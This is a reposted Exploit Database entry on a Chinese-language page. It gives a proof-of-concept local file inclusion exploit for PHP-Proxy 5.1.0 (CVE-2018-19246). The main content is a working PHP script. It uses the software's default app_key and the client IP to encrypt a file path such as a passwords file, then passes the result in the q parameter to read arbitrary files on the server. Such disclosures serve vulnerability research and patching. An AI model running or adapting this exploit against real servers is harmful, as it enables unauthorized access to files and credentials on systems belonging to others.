PHP-Proxy 5.1.0 – Local File Inclusion

• Exploit Database
• 18 阅读

• 作者： Ameer Pornillos
  日期： 2018-11-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45861/

• # Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion
  # Date: 2018-11-13
  # Exploit Author: Ameer Pornillos
  # Contact: https://ethicalhackers.club
  # Vendor Homepage: https://www.php-proxy.com/
  # Software Link: https://www.php-proxy.com/download/php-proxy.zip
  # Version: 5.1.0
  # Category: Webapps
  # Tested on: XAMPP on Win10_x64
  # Description: Downloadable pre-installed version of PHP-Proxy 5.1.0 
  # make use of a default app_key wherein can be used for local file inclusion
  # attacks. This can be used to generate encrypted string which 
  # can gain access to arbitrary local files in the server.
  # http://php-proxy-site/index.php?q=[encrypted_string_value]
  # CVE: CVE-2018-19246
  
  # POC: 
  # 1)
  # Generate encrypted string value using the PHP script below
  # 2)
  # Browse to URL 
  # http://php-proxy-site/index.php?q=[encrypted_string_value]
  # to read local file
  
  <?php
  $file = "file:///C:/xampp/passwords.txt"; //example target file to read
  $ip = "192.168.0.1"; //change depending on your IP address that access the app
  $app_key = "aeb067ca0aa9a3193dce3a7264c90187";
  $key = md5($app_key.$ip);
  function str_rot_pass($str, $key, $decrypt = false){
  $key_len = strlen($key);
  $result = str_repeat(' ', strlen($str));
  for($i=0; $i<strlen($str); $i++){
  if($decrypt){
  $ascii = ord($str[$i]) - ord($key[$i % $key_len]);
  } else {
  $ascii = ord($str[$i]) + ord($key[$i % $key_len]);
  }
  $result[$i] = chr($ascii);
  }
  return $result;
  }
  function base64_url_encode($input){
  return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');
  }
  echo base64_url_encode(str_rot_pass($file, $key));
  ?>